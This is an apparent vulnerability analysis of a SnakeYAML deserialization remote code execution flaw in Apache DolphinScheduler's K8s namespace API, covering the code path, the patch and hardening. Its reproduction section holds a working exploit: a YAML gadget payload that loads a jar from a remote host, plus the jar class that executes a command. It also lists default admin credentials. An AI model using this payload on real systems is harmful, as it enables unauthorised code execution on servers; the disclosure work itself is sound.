Vulnerability Description

A remote code execution vulnerability exists in Apache DolphinScheduler. This issue affects versions of Apache DolphinScheduler before 3.2.1. Users are advised to upgrade to version 3.2.1, which fixes the issue.

Affected Versions

3.0.0 <= version < 3.2.1

Environment Setup

Download the source code and the binary distribution from the official website:

tar -xvzf apache-dolphinscheduler-*-bin.tar.gz
cd apache-dolphinscheduler-*-bin
bash ./bin/dolphinscheduler-daemon.sh start standalone-server

Modify the JVM options in standalone-server/bin/start.sh to enable remote debugging (e.g. the standard JDWP agent flag -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005, so IDEA can attach).

Visit http://localhost:12345/dolphinscheduler/ui and log in with the default credentials:

  • admin/dolphinscheduler123

Code Analysis

Start from the fix patch: [Improvement][K8S] Remove ResourceQuota by Gallardot · Pull Request #14991 · apache/dolphinscheduler · GitHub

From the patch it is fairly obvious that the vulnerable path enters through K8sNamespaceController.
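For orientation, here is a hedged sketch of that entry point (the route, annotations, and the returnDataList helper are my reconstruction from the service signature, not verbatim upstream source):

// Hedged reconstruction of K8sNamespaceController -- illustrative only.
// The user-supplied request parameters flow straight into the vulnerable service method.
@RestController
@RequestMapping("/k8s-namespace")
public class K8sNamespaceController extends BaseController {

    @Autowired
    private K8sNamespaceService k8sNamespaceService;

    @PostMapping
    public Result createNamespace(@RequestAttribute(value = Constants.SESSION_USER) User loginUser,
                                  @RequestParam(value = "namespace") String namespace,
                                  @RequestParam(value = "clusterCode") Long clusterCode,
                                  @RequestParam(value = "limitsCpu", required = false) Double limitsCpu,
                                  @RequestParam(value = "limitsMemory", required = false) Integer limitsMemory) {
        Map<String, Object> result =
                k8sNamespaceService.createK8sNamespace(loginUser, namespace, clusterCode, limitsCpu, limitsMemory);
        return returnDataList(result);
    }
}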
Set a breakpoint in the implementation class:
org.apache.dolphinscheduler.api.service.impl.K8SNamespaceServiceImpl#createK8sNamespace

@Override  
public Map<String, Object> createK8sNamespace(User loginUser, String namespace, Long clusterCode, Double limitsCpu,  
                                              Integer limitsMemory) {  
    Map<String, Object> result = new HashMap<>();  
    if (isNotAdmin(loginUser, result)) {  
        log.warn("Only admin can create K8s namespace, current login user name:{}.", loginUser.getUserName());  
        return result;  
    }  

    if (StringUtils.isEmpty(namespace)) {  
        log.warn("Parameter namespace is empty.");  
        putMsg(result, Status.REQUEST_PARAMS_NOT_VALID_ERROR, Constants.NAMESPACE);  
        return result;  
    }  

    if (clusterCode == null) {  
        log.warn("Parameter clusterCode is null.");  
        putMsg(result, Status.REQUEST_PARAMS_NOT_VALID_ERROR, Constants.CLUSTER);  
        return result;  
    }  

    if (limitsCpu != null && limitsCpu < 0.0) {  
        log.warn("Parameter limitsCpu is invalid.");  
        putMsg(result, Status.REQUEST_PARAMS_NOT_VALID_ERROR, Constants.LIMITS_CPU);  
        return result;  
    }  

    if (limitsMemory != null && limitsMemory < 0) {  
        log.warn("Parameter limitsMemory is invalid.");  
        putMsg(result, Status.REQUEST_PARAMS_NOT_VALID_ERROR, Constants.LIMITS_MEMORY);  
        return result;  
    }  

    if (checkNamespaceExistInDb(namespace, clusterCode)) {  
        log.warn("K8S namespace already exists.");  
        putMsg(result, Status.K8S_NAMESPACE_EXIST, namespace, clusterCode);  
        return result;  
    }  

    Cluster cluster = clusterMapper.queryByClusterCode(clusterCode);  
    if (cluster == null) {  
        log.error("Cluster does not exist, clusterCode:{}", clusterCode);  
        putMsg(result, Status.CLUSTER_NOT_EXISTS, namespace, clusterCode);  
        return result;  
    }  

    long code = 0L;  
    try {  
        code = CodeGenerateUtils.getInstance().genCode();  
        cluster.setCode(code);  
    } catch (CodeGenerateUtils.CodeGenerateException e) {  
        log.error("Generate cluster code error.", e);  
    }  
    if (code == 0L) {  
        putMsg(result, Status.INTERNAL_SERVER_ERROR_ARGS, "Error generating cluster code");  
        return result;  
    }  

    K8sNamespace k8sNamespaceObj = new K8sNamespace();  
    Date now = new Date();  

    k8sNamespaceObj.setCode(code);  
    k8sNamespaceObj.setNamespace(namespace);  
    k8sNamespaceObj.setClusterCode(clusterCode);  
    k8sNamespaceObj.setUserId(loginUser.getId());  
    k8sNamespaceObj.setLimitsCpu(limitsCpu);  
    k8sNamespaceObj.setLimitsMemory(limitsMemory);  
    k8sNamespaceObj.setPodReplicas(0);  
    k8sNamespaceObj.setPodRequestCpu(0.0);  
    k8sNamespaceObj.setPodRequestMemory(0);  
    k8sNamespaceObj.setCreateTime(now);  
    k8sNamespaceObj.setUpdateTime(now);  

    if (!Constants.K8S_LOCAL_TEST_CLUSTER_CODE.equals(k8sNamespaceObj.getClusterCode())) {  
        try {  
            String yamlStr = genDefaultResourceYaml(k8sNamespaceObj);  
            k8sClientService.upsertNamespaceAndResourceToK8s(k8sNamespaceObj, yamlStr);  
        } catch (Exception e) {  
            log.error("Namespace create to k8s error", e);  
            putMsg(result, Status.K8S_CLIENT_OPS_ERROR, e.getMessage());  
            return result;  
        }  
    }  

    k8sNamespaceMapper.insert(k8sNamespaceObj);  
    log.info("K8s namespace create complete, namespace:{}.", k8sNamespaceObj.getNamespace());  
    putMsg(result, Status.SUCCESS);  

    return result;  
}

The first half of the method validates the request parameters and builds a k8sNamespaceObj from them. The key part is the following:

if (!Constants.K8S_LOCAL_TEST_CLUSTER_CODE.equals(k8sNamespaceObj.getClusterCode())) {  
    try {  
        String yamlStr = genDefaultResourceYaml(k8sNamespaceObj);  
        k8sClientService.upsertNamespaceAndResourceToK8s(k8sNamespaceObj, yamlStr);  
    } catch (Exception e) {  
        log.error("Namespace create to k8s error", e);  
        putMsg(result, Status.K8S_CLIENT_OPS_ERROR, e.getMessage());  
        return result;  
    }  
}

genDefaultResourceYaml converts k8sNamespaceObj into yamlStr; since k8sNamespaceObj is built from attacker-controlled parameters, yamlStr is attacker-controlled as well. A hedged sketch of that conversion follows.
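To make the taint flow concrete, here is a hedged paraphrase of genDefaultResourceYaml (not the verbatim upstream template): the user-supplied namespace string is spliced into a ResourceQuota YAML document with no escaping, so a namespace beginning with a !! type tag rewrites the document's meaning when it is later parsed.

// Hedged paraphrase of genDefaultResourceYaml -- illustrative only
private String genDefaultResourceYaml(K8sNamespace k8sNamespace) {
    String name = k8sNamespace.getNamespace(); // attacker-controlled
    return "apiVersion: v1\n"
            + "kind: ResourceQuota\n"
            + "metadata:\n"
            + "  name: " + name + "\n"      // payload lands here unescaped...
            + "  namespace: " + name + "\n" // ...and here
            + "spec:\n"
            + "  hard:\n"
            + "    limits.cpu: " + k8sNamespace.getLimitsCpu() + "\n"
            + "    limits.memory: " + k8sNamespace.getLimitsMemory() + "Gi\n";
}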
From there, step into K8sClientService#upsertNamespaceAndResourceToK8s:

public ResourceQuota upsertNamespaceAndResourceToK8s(K8sNamespace k8sNamespace,  
                                                     String yamlStr) throws RemotingException {  
    if (!checkNamespaceToK8s(k8sNamespace.getNamespace(), k8sNamespace.getClusterCode())) {  
        throw new RemotingException(String.format(  
                "namespace %s does not exist in k8s cluster, please create namespace in k8s cluster first",  
                k8sNamespace.getNamespace()));  
    }  
    return upsertNamespacedResourceToK8s(k8sNamespace, yamlStr);  
}
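For context, checkNamespaceToK8s is essentially a liveness gate: it asks the target cluster whether the namespace already exists. A hedged sketch (not verbatim source; the fabric8 calls are illustrative):

// Without a real, reachable k8s cluster this lookup throws or returns false,
// which is why a standalone deployment never reaches the sink on its own.
private boolean checkNamespaceToK8s(String name, Long clusterCode) throws RemotingException {
    KubernetesClient client = k8sManager.getK8sClient(clusterCode);
    return client.namespaces().withName(name).get() != null;
}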

checkNamespaceToK8s first verifies the k8s environment (see the sketch above); once that check passes, execution proceeds to K8sClientService#upsertNamespacedResourceToK8s:

private ResourceQuota upsertNamespacedResourceToK8s(K8sNamespace k8sNamespace,  
                                                    String yamlStr) throws RemotingException {  

    KubernetesClient client = k8sManager.getK8sClient(k8sNamespace.getClusterCode());  

    // query whether a ResourceQuota with this name already exists
    ResourceQuota queryExist = client.resourceQuotas()  
            .inNamespace(k8sNamespace.getNamespace())  
            .withName(k8sNamespace.getNamespace())  
            .get();  

    ResourceQuota body = yaml.loadAs(yamlStr, ResourceQuota.class);  

    if (queryExist != null) {  
        if (k8sNamespace.getLimitsCpu() == null && k8sNamespace.getLimitsMemory() == null) {  
            client.resourceQuotas().inNamespace(k8sNamespace.getNamespace())  
                    .withName(k8sNamespace.getNamespace())  
                    .delete();  
            return null;  
        }  
    }  

    return client.resourceQuotas().inNamespace(k8sNamespace.getNamespace())  
            .withName(k8sNamespace.getNamespace())  
            .createOrReplace(body);  
}

The method first obtains the k8s client for the cluster and queries the existing ResourceQuota, then deserializes the attacker-controlled yamlStr with SnakeYAML's loadAs. The yaml instance is created as follows:
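In the unpatched source this is, to the best of my reading, just a default-constructed instance (hedged reconstruction):

// K8sClientService field: SnakeYAML's default Constructor resolves global
// !!fully.qualified.ClassName tags and instantiates those classes during
// load/loadAs -- no SafeConstructor, which is what makes the sink exploitable.
private final Yaml yaml = new Yaml();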

SnakeYAML deserialization with a default-constructed Yaml is a well-known exploitation primitive, so we can move straight to reproduction.
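As a minimal, self-contained illustration of the primitive (assumes snakeyaml on the classpath; the URL is a placeholder for a jar you host yourself):

import org.yaml.snakeyaml.Yaml;

public class SnakeYamlRceDemo {
    public static void main(String[] args) {
        // ScriptEngineManager(ClassLoader) scans the supplied class loader for
        // META-INF/services/javax.script.ScriptEngineFactory entries and
        // instantiates each listed factory, running its constructor.
        String payload = "!!javax.script.ScriptEngineManager [\n"
                + "  !!java.net.URLClassLoader [[\n"
                + "    !!java.net.URL [\"http://127.0.0.1:8377/yaml-payload.jar\"]\n"
                + "  ]]\n"
                + "]";
        new Yaml().load(payload); // default constructor => !! class tags are honored
    }
}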

Reproduction

Since I deployed in standalone mode, the k8s environment check cannot pass, so I reproduce the sink directly with IDEA's Evaluate Expression.
First, log in to the DolphinScheduler console.

Go to Security -> Cluster Manage -> Create Cluster.
Create a cluster with arbitrary settings (I am not running a real k8s environment, so the values do not matter).

Then go to Security -> K8S Namespace Manage -> Create Namespace.

Select the cluster you just created as the k8s cluster, and supply a malicious SnakeYAML deserialization payload as the namespace:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://172.18.176.1:8377/yaml-payload.jar"]
  ]]
]
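For reference, yaml-payload.jar here follows the classic artsploit/yaml-payload layout (a reconstruction; the command below is an example): the jar ships a service registration file META-INF/services/javax.script.ScriptEngineFactory containing the class name below, so ScriptEngineManager instantiates the class and its constructor runs on the server.

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            // executed on the victim as soon as ScriptEngineManager
            // instantiates this factory from the remote jar
            Runtime.getRuntime().exec("calc.exe"); // example command
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() { return null; }
    @Override
    public String getEngineVersion() { return null; }
    @Override
    public List<String> getExtensions() { return null; }
    @Override
    public List<String> getMimeTypes() { return null; }
    @Override
    public List<String> getNames() { return null; }
    @Override
    public String getLanguageName() { return null; }
    @Override
    public String getLanguageVersion() { return null; }
    @Override
    public Object getParameter(String key) { return null; }
    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) { return null; }
    @Override
    public String getOutputStatement(String toDisplay) { return null; }
    @Override
    public String getProgram(String... statements) { return null; }
    @Override
    public ScriptEngine getScriptEngine() { return null; }
}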

Set a breakpoint at org.apache.dolphinscheduler.api.k8s.K8sClientService#upsertNamespaceAndResourceToK8s: at this point the k8s environment check has not yet run, and the yaml object is already initialized.

You can see that yamlStr is attacker-controlled here. Now use Evaluate Expression to run the following line (if the k8s environment check had passed, it would execute on its own):

ResourceQuota body = yaml.loadAs(yamlStr, ResourceQuota.class);

The server hosting yaml-payload.jar successfully receives the request.

Arbitrary code is successfully executed.

Vulnerability Fix

Looking at the patch again ([Improvement][K8S] Remove ResourceQuota by Gallardot · Pull Request #14991 · apache/dolphinscheduler · GitHub): the code that deserialized objects via yaml.loadAs has been removed entirely, so the gadget chain can no longer be reached.
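For reference, the generic hardening for this bug class (the actual patch simply removed the yaml.loadAs code path rather than doing this) is to restrict SnakeYAML to plain data types with SafeConstructor:

import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;

public class SafeYamlDemo {
    public static void main(String[] args) {
        // SafeConstructor (SnakeYAML 1.x API; 2.x additionally takes a
        // LoaderOptions argument) only builds standard types, so any
        // !!fully.qualified.ClassName tag fails with a ConstructorException
        // instead of being instantiated.
        Yaml safeYaml = new Yaml(new SafeConstructor());
        System.out.println(safeYaml.load("limits: {cpu: 2, memory: 4Gi}"));
    }
}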
